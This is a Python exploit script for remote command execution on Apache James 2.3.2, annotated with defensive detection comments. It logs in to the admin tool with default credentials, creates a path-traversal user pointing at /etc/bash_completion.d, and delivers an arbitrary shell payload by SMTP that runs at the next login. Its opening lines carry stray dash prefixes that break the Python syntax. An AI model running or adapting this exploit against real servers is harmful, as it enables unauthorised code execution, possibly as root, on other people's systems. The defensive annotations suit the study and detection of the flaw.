- """An exploit for Apache James 2.3.2 that executes remote commands.
- This script works on Apache James deployments that use the default
- configuration. It enqueues a payload to be executed the next time a user logs
- in to the machine.
- The default payload is "touch /tmp/proof.txt." However, if the server runs as
- root, then the following command may be used:
- [ "$(id -u)" == "0" ] && touch /root/proof.txt
- For more details, see: https://www.exploit-db.com/exploits/35513/.
- """
- import gflags
- import socket
- import sys
- import time
# Socket tunables shared by the admin and SMTP exchanges.
RECV_BYTES = 1024  # maximum number of bytes read per server reply
SLEEP_SEC = 0.2    # seconds to pause after each SMTP reply is read

# Administrator login the remote administration tool accepts in its default
# configuration. The whole script depends on these never having been changed,
# so rotating them (and keeping the admin port off untrusted networks) removes
# the first step it needs.
ADMIN_USER = 'root'
ADMIN_PASSWORD = 'root'

# Command-line options. The two port flags are declared as integers but are
# given string defaults.
# NOTE(review): presumably gflags parses the string defaults to int - confirm.
FLAGS = gflags.FLAGS

gflags.DEFINE_string('payload', 'touch /tmp/proof.txt',
                     'The payload to execute.')
gflags.DEFINE_string('host', '127.0.0.1',
                     'The host address of the Apache James deployment.')
gflags.DEFINE_integer('admin_port', '4555',
                      'The port number of the administration tool.')
gflags.DEFINE_integer(
    'smtp_port', '25', 'The port number of the SMTP server.')
def ConnectToAdminServer():
    """Opens a TCP session to the administration tool and logs in.

    The login uses ADMIN_USER / ADMIN_PASSWORD, i.e. the default administrator
    account. Every reply is read and thrown away, so a rejected login is not
    noticed here; the caller simply gets the socket back.

    Defensive reading: this step only succeeds where the admin port is
    reachable from the caller and still accepts the default credentials.
    Logins to the administration tool from unexpected addresses are the
    earliest place to alert on.

    Returns:
      An open socket to the administration server.
    """
    admin_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    admin_sock.connect((FLAGS.host, FLAGS.admin_port))
    # Discard whatever the server sends on connect (presumably the banner and
    # login prompt).
    admin_sock.recv(RECV_BYTES)
    # Send user name, then password, reading one reply after each.
    for credential in (ADMIN_USER, ADMIN_PASSWORD):
        admin_sock.send(credential + '\n')
        admin_sock.recv(RECV_BYTES)
    return admin_sock
def ConnectToSmtpServer():
    """Opens a TCP session to the SMTP server and sends the EHLO greeting.

    No authentication is attempted; the reply to EHLO is read and discarded
    by RecvAndSleep.

    Returns:
      An open socket to the SMTP server.
    """
    smtp_endpoint = (FLAGS.host, FLAGS.smtp_port)
    smtp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    smtp_sock.connect(smtp_endpoint)
    smtp_sock.send('ehlo team@team.pl\r\n')
    RecvAndSleep(smtp_sock)
    return smtp_sock
def CreateNewSmtpUser(s):
    """Creates a new SMTP user through the administration tool, then quits.

    The user name sent is not an ordinary account name: it is a relative path
    made of '../' segments ending in etc/bash_completion.d, with the password
    'exploit'.
    NOTE(review): presumably the server uses the user name unnormalised when
    it locates that user's mail, which is what lets later mail be written
    outside the mail store - confirm against the linked exploit-db entry.

    Defensive reading: an 'adduser' whose name contains '/' or '..' has no
    legitimate use. Admin-tool logs and the user repository can be searched
    for such names, and unexpected files under /etc/bash_completion.d are the
    on-host artefact to look for.

    Args:
      s: An open socket to the administration tool.
    """
    add_user_command = (
        'adduser ../../../../../../../../etc/bash_completion.d exploit\n')
    s.send(add_user_command)
    s.recv(RECV_BYTES)  # reply is discarded; success is not verified
    s.send('quit\n')
    s.close()
def RecvAndSleep(s):
    """Reads one reply from a socket, discards it, and pauses.

    At most RECV_BYTES are read and the content is never inspected, so server
    error replies go unnoticed. The pause lasts SLEEP_SEC seconds.

    Args:
      s: An open socket.
    """
    _ = s.recv(RECV_BYTES)
    time.sleep(SLEEP_SEC)
def SendSmtpPayload(s):
    """Sends one message carrying FLAGS.payload to the SMTP server.

    The recipient is the path-style user name created earlier through the
    administration tool, and the message body is a line holding a single
    quote followed by the payload line. After the message is accepted the
    session is ended with 'quit' and the socket is closed.

    Defensive reading: a RCPT TO value containing '../' is the network-side
    indicator of this step, and SMTP logs or an inline mail filter can reject
    or alert on it. Per the module docstring the payload runs at a later user
    login, so file-integrity monitoring on /etc/bash_completion.d covers the
    gap between delivery and execution.

    Args:
      s: An open socket to the SMTP server.
    """
    # Envelope commands: each is followed by one discarded reply.
    # Also try: ../../../../../../../../etc/bash_completion.d@hostname>\r\n
    envelope_commands = (
        'mail from: <\'@team.pl>\r\n',
        'rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n',
        'data\r\n',
    )
    for command in envelope_commands:
        s.send(command)
        RecvAndSleep(s)

    # Message content: header, blank line, body, end-of-data marker. These
    # are sent back to back and only the final reply is read.
    message_parts = (
        'From: team@team.pl\r\n',
        '\r\n',
        '\'\n',
        FLAGS.payload + '\n',
        '\r\n.\r\n',
    )
    for part in message_parts:
        s.send(part)
    RecvAndSleep(s)

    s.send('quit\r\n')
    RecvAndSleep(s)
    s.close()
def Main(argv):
    """Parses the flags, then runs the two stages in order.

    Stage one logs in to the administration tool and adds the path-named
    user; stage two delivers the message to that user over SMTP. Neither
    stage checks server replies, so the script reports nothing about whether
    the target accepted either step.

    Args:
      argv: The command-line argument list, program name first.
    """
    try:
        argv = FLAGS(argv)
    except gflags.FlagsError as flag_error:
        # Bad flags: print the error with usage text and exit non-zero.
        print('%s\nUsage: %s ARGS\n%s' % (flag_error, sys.argv[0], FLAGS))
        sys.exit(-1)

    admin_sock = ConnectToAdminServer()
    CreateNewSmtpUser(admin_sock)

    smtp_sock = ConnectToSmtpServer()
    SendSmtpPayload(smtp_sock)


if __name__ == '__main__':
    Main(sys.argv)